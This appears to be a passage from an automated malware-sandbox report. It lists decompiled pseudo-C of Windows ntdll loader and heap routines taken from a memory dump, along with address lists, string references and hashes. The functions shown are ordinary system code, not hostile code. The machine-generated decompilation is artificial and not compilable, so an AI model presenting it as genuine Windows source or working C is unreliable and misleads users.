                                                      0x01809c5b
                                                      0x01809cac
                                                      0x01809cc0
                                                      0x01809cc0
                                                      0x01809c55
                                                      0x017b8927
                                                      0x017b8927
                                                      0x017b892f
                                                      0x017b8933
                                                      0x00000000
                                                      0x017b88f5
                                                      0x017b88f5
                                                      0x00000000
                                                      0x017b88f7
                                                      0x017b88f7
                                                      0x017b88fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017b88fa
                                                      0x017b88f5
                                                      0x017b88f3
                                                      0x00000000
                                                      0x017b88d5
                                                      0x00000000
                                                      0x017b88b2
                                                      0x017b88c9
                                                      0x00000000
                                                      0x017b88c9
                                                      0x017b887f
                                                      0x017b886a
                                                      0x017b8857
                                                      0x017b8852
                                                      0x017b88bf
                                                      0x017b88bf
                                                      0x017b87aa
                                                      0x017b87ad
                                                      0x017b87ae
                                                      0x017b87b4
                                                      0x017b87b5
                                                      0x017b87b6
                                                      0x017b87b8
                                                      0x017b87bd
                                                      0x017b87c1
                                                      0x017b87f4
                                                      0x017b87fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017b87c1
                                                      0x00000000

                                                      Strings
                                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01809C18
                                                      • LdrpDoPostSnapWork, xrefs: 01809C1E
                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 01809C28
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 2994545307-1948996284
                                                      • Opcode ID: fe15fed0abe96d0654943ff480ee95cbe9123c506fb323a39fc4e5acb961cd4a
                                                      • Instruction ID: 970064ee97e3d540748acea143643db175bdbcda45880d071822ab351c6f27b9
                                                      • Opcode Fuzzy Hash: fe15fed0abe96d0654943ff480ee95cbe9123c506fb323a39fc4e5acb961cd4a
                                                      • Instruction Fuzzy Hash: E991E271A1021ADBDF19DF59D8C0AEAF7B9FF44318B054169EA05AB245DB30EA01CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017B7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E017B7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E017BCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E017AC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1895780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01825510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1895780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E017C7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E017C7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01827016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E017C7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E017C7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01827016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E017DA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E017AB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                      0x017b7e4c
                                                      0x017b7e50
                                                      0x017b7e55
                                                      0x017b7e58
                                                      0x017b7e5d
                                                      0x017b7e71
                                                      0x017b7f33
                                                      0x017b7e77
                                                      0x017b7e77
                                                      0x017b7e79
                                                      0x017b7e79
                                                      0x017b7e7e
                                                      0x017b7f45
                                                      0x01809848
                                                      0x00000000
                                                      0x01809848
                                                      0x017b7f4e
                                                      0x017b7f53
                                                      0x017b7f5a
                                                      0x00000000
                                                      0x00000000
                                                      0x0180985a
                                                      0x01809862
                                                      0x01809866
                                                      0x00000000
                                                      0x0180986c
                                                      0x00000000
                                                      0x0180986c
                                                      0x017b7e84
                                                      0x017b7e84
                                                      0x017b7e8d
                                                      0x01809871
                                                      0x017b7eb8
                                                      0x017b7ec0
                                                      0x017b7ec0
                                                      0x017b7e9a
                                                      0x0180987e
                                                      0x00000000
                                                      0x00000000
                                                      0x01809884
                                                      0x0180988b
                                                      0x018098a7
                                                      0x018098ac
                                                      0x018098b1
                                                      0x018098b6
                                                      0x018098b8
                                                      0x018098b8
                                                      0x018098b9
                                                      0x00000000
                                                      0x018098b9
                                                      0x017b7ea0
                                                      0x017b7ea7
                                                      0x00000000
                                                      0x00000000
                                                      0x017b7eac
                                                      0x017b7eb1
                                                      0x017b7ec6
                                                      0x017b7ed0
                                                      0x018098cc
                                                      0x017b7ed6
                                                      0x017b7ed6
                                                      0x017b7ed6
                                                      0x017b7ede
                                                      0x017b7ee3
                                                      0x018098e3
                                                      0x018098f0
                                                      0x01809902
                                                      0x018098f2
                                                      0x018098fb
                                                      0x018098fb
                                                      0x01809907
                                                      0x0180991d
                                                      0x0180991d
                                                      0x01809907
                                                      0x018098e3
                                                      0x017b7ef0
                                                      0x017b7f14
                                                      0x017b7f14
                                                      0x017b7f1e
                                                      0x01809946
                                                      0x017b7f24
                                                      0x017b7f24
                                                      0x017b7f24
                                                      0x017b7f2c
                                                      0x0180996a
                                                      0x01809975
                                                      0x01809975
                                                      0x0180997e
                                                      0x01809993
                                                      0x01809993
                                                      0x0180997e
                                                      0x00000000
                                                      0x017b7ef2
                                                      0x017b7efc
                                                      0x017b7f0a
                                                      0x017b7f0e
                                                      0x01809933
                                                      0x00000000
                                                      0x01809933
                                                      0x00000000
                                                      0x017b7f0e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017b7eb1

                                                      Strings
                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 01809891
                                                      • LdrpCompleteMapModule, xrefs: 01809898
                                                      • minkernel\ntdll\ldrmap.c, xrefs: 018098A2
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                      • API String ID: 0-1676968949
                                                      • Opcode ID: 21221e73558f043fc1a61975e380086d9e0368fa8ab255208350f34e0824ff82
                                                      • Instruction ID: aee34e6c0e18deeae0fdf883fcad0d23d3041c7da1464c4abf79c4037decf711
                                                      • Opcode Fuzzy Hash: 21221e73558f043fc1a61975e380086d9e0368fa8ab255208350f34e0824ff82
                                                      • Instruction Fuzzy Hash: 2251F531A00745DBE72ACB5CC9C4BA9FBA4AF88714F040699E955DB7D2D734EE00C750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017AE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E017AE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E017AF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E017E95D0();
						}
						if(_t78 != 0) {
							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E017EFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E017EBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E017E9600();
					if(_t97 < 0) {
						goto L6;
					}
					E017EBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L017AF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E017EBB40(_t83, _t102 + 0x24, _t78);
								if(L017B43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E017EBB40(_t84, _t102 + 0x24, _t94);
									if(L017B43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                      0x017ae620
                                                      0x017ae628
                                                      0x017ae62f
                                                      0x017ae631
                                                      0x017ae635
                                                      0x017ae637
                                                      0x017ae63e
                                                      0x01805503
                                                      0x01805503
                                                      0x017ae64c
                                                      0x017ae64c
                                                      0x017ae651
                                                      0x00000000
                                                      0x00000000
                                                      0x017ae661
                                                      0x017ae665
                                                      0x0180542a
                                                      0x017ae715
                                                      0x017ae71a
                                                      0x017ae71c
                                                      0x017ae720
                                                      0x017ae720
                                                      0x017ae727
                                                      0x017ae736
                                                      0x017ae736
                                                      0x017ae743
                                                      0x017ae743
                                                      0x017ae673
                                                      0x017ae678
                                                      0x017ae67d
                                                      0x017ae682
                                                      0x017ae685
                                                      0x017ae692
                                                      0x017ae69b
                                                      0x017ae6a3
                                                      0x017ae6ad
                                                      0x017ae6b1
                                                      0x017ae6b2
                                                      0x017ae6bb
                                                      0x017ae6bf
                                                      0x017ae6c0
                                                      0x017ae6c8
                                                      0x017ae6cc
                                                      0x017ae6d5
                                                      0x017ae6d9
                                                      0x00000000
                                                      0x00000000
                                                      0x017ae6e5
                                                      0x017ae6ea
                                                      0x017ae6f9
                                                      0x017ae70b
                                                      0x017ae70f
                                                      0x01805439
                                                      0x0180545e
                                                      0x0180545e
                                                      0x00000000
                                                      0x0180545e
                                                      0x0180543b
                                                      0x0180543e
                                                      0x01805440
                                                      0x01805445
                                                      0x01805472
                                                      0x01805475
                                                      0x0180548d
                                                      0x01805493
                                                      0x018054a9
                                                      0x00000000
                                                      0x00000000
                                                      0x018054ab
                                                      0x018054b4
                                                      0x018054bc
                                                      0x018054c8
                                                      0x018054de
                                                      0x018054fb
                                                      0x018054e0
                                                      0x018054e6
                                                      0x018054eb
                                                      0x018054eb
                                                      0x018054de
                                                      0x00000000
                                                      0x018054bc
                                                      0x01805477
                                                      0x0180547a
                                                      0x01805480
                                                      0x01805483
                                                      0x01805486
                                                      0x0180548b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0180548b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01805447
                                                      0x01805447
                                                      0x01805447
                                                      0x01805447
                                                      0x0180544e
                                                      0x00000000
                                                      0x00000000
                                                      0x01805450
                                                      0x01805452
                                                      0x01805455
                                                      0x0180545a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0180545c
                                                      0x0180546a
                                                      0x0180546d
                                                      0x0180546f
                                                      0x00000000
                                                      0x0180546f
                                                      0x017ae70f

                                                      Strings
                                                      • @, xrefs: 017AE6C0
                                                      • InstallLanguageFallback, xrefs: 017AE6DB
                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 017AE68C
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                      • API String ID: 0-1757540487
                                                      • Opcode ID: 9b9e924d7caf41ef72e965165a84f78ac2a12af0541c80530d594a70e72c0d2d
                                                      • Instruction ID: 2a36cd8cc6b2792d7f1ef65a31f5f5a25b610ead4f1788c675461987b3c87494
                                                      • Opcode Fuzzy Hash: 9b9e924d7caf41ef72e965165a84f78ac2a12af0541c80530d594a70e72c0d2d
                                                      • Instruction Fuzzy Hash: 8D51A6B15043469BD715DF24C884AABF7E8BF88714F45096EF985D7250FB34DA04CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0186E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 60%
                                                      			E0186E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0186BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0186BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0186AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E017E9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0186A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0186A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E017E9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0186A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0186A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E017C2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E017BB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E017BFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E017C7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0185FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                      0x0186e547
                                                      0x0186e549
                                                      0x0186e54f
                                                      0x0186e553
                                                      0x0186e557
                                                      0x0186e55a
                                                      0x0186e55c
                                                      0x0186e55f
                                                      0x0186e561
                                                      0x0186e567
                                                      0x0186e56b
                                                      0x0186e7e2
                                                      0x00000000
                                                      0x0186e571
                                                      0x0186e575
                                                      0x0186e577
                                                      0x0186e57b
                                                      0x0186e57c
                                                      0x0186e57d
                                                      0x0186e57e
                                                      0x0186e57f
                                                      0x0186e588
                                                      0x0186e58f
                                                      0x0186e591
                                                      0x0186e592
                                                      0x0186e592
                                                      0x0186e596
                                                      0x0186e59e
                                                      0x0186e5a0
                                                      0x0186e5a6
                                                      0x0186e61d
                                                      0x0186e61d
                                                      0x0186e621
                                                      0x0186e623
                                                      0x0186e630
                                                      0x0186e630
                                                      0x0186e7e6
                                                      0x0186e7eb
                                                      0x0186e7ed
                                                      0x0186e7f4
                                                      0x0186e7fa
                                                      0x0186e7ff
                                                      0x0186e7ff
                                                      0x0186e80a
                                                      0x0186e812
                                                      0x0186e812
                                                      0x0186e5ab
                                                      0x0186e5b4
                                                      0x0186e5b9
                                                      0x0186e5be
                                                      0x0186e5c0
                                                      0x0186e5c2
                                                      0x0186e5c8
                                                      0x0186e5c9
                                                      0x0186e5cb
                                                      0x0186e5cc
                                                      0x0186e5d5
                                                      0x0186e5e4
                                                      0x0186e5f1
                                                      0x0186e5f8
                                                      0x0186e5f8
                                                      0x0186e5d5
                                                      0x0186e602
                                                      0x0186e616
                                                      0x0186e63d
                                                      0x0186e644
                                                      0x0186e64d
                                                      0x0186e652
                                                      0x0186e657
                                                      0x0186e659
                                                      0x0186e65b
                                                      0x0186e661
                                                      0x0186e662
                                                      0x0186e664
                                                      0x0186e665
                                                      0x0186e66e
                                                      0x0186e67d
                                                      0x0186e68a
                                                      0x0186e691
                                                      0x0186e691
                                                      0x0186e66e
                                                      0x0186e6b0
                                                      0x00000000
                                                      0x0186e6b6
                                                      0x0186e6bd
                                                      0x0186e6c7
                                                      0x0186e6d7
                                                      0x0186e6d9
                                                      0x0186e6db
                                                      0x0186e6de
                                                      0x0186e6e3
                                                      0x0186e6f3
                                                      0x0186e6fc
                                                      0x0186e700
                                                      0x0186e700
                                                      0x0186e704
                                                      0x0186e70a
                                                      0x0186e70a
                                                      0x0186e713
                                                      0x0186e716
                                                      0x0186e719
                                                      0x0186e720
                                                      0x0186e761
                                                      0x0186e76b
                                                      0x0186e774
                                                      0x0186e77a
                                                      0x0186e77a
                                                      0x0186e78a
                                                      0x0186e791
                                                      0x0186e799
                                                      0x0186e79b
                                                      0x0186e79f
                                                      0x0186e7aa
                                                      0x0186e7c0
                                                      0x0186e7ac
                                                      0x0186e7b2
                                                      0x0186e7b9
                                                      0x0186e7b9
                                                      0x0186e7c7
                                                      0x0186e806
                                                      0x00000000
                                                      0x0186e7c9
                                                      0x0186e7d1
                                                      0x0186e7d8
                                                      0x00000000
                                                      0x0186e7d8
                                                      0x00000000
                                                      0x00000000
                                                      0x0186e722
                                                      0x0186e72e
                                                      0x0186e748
                                                      0x0186e74c
                                                      0x0186e754
                                                      0x0186e756
                                                      0x0186e75c
                                                      0x0186e75c
                                                      0x00000000
                                                      0x0186e75c
                                                      0x0186e758
                                                      0x0186e758
                                                      0x00000000
                                                      0x0186e758
                                                      0x0186e750
                                                      0x00000000
                                                      0x00000000
                                                      0x0186e752
                                                      0x00000000
                                                      0x0186e752
                                                      0x0186e730
                                                      0x0186e735
                                                      0x0186e73d
                                                      0x0186e73f
                                                      0x00000000
                                                      0x00000000
                                                      0x0186e741
                                                      0x0186e741
                                                      0x00000000
                                                      0x0186e741
                                                      0x0186e739
                                                      0x00000000
                                                      0x00000000
                                                      0x0186e73b
                                                      0x00000000
                                                      0x0186e73b
                                                      0x0186e722
                                                      0x0186e720
                                                      0x0186e6b0
                                                      0x0186e618
                                                      0x00000000
                                                      0x0186e618

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction ID: b75a7ac0a7951a91b8104795e1e21f79f81878431385b116c4126f03d84f640c
                                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction Fuzzy Hash: 34919F752043429FE725CE29C845B1BBBEABF84714F14892DFA95CB280E774EA04CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 018251BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E018251BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x18805f0);
				E017FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E017BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E018253CA(0);
						return E017FD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E017EF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E017C3690(1, _t117, 0x1781810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
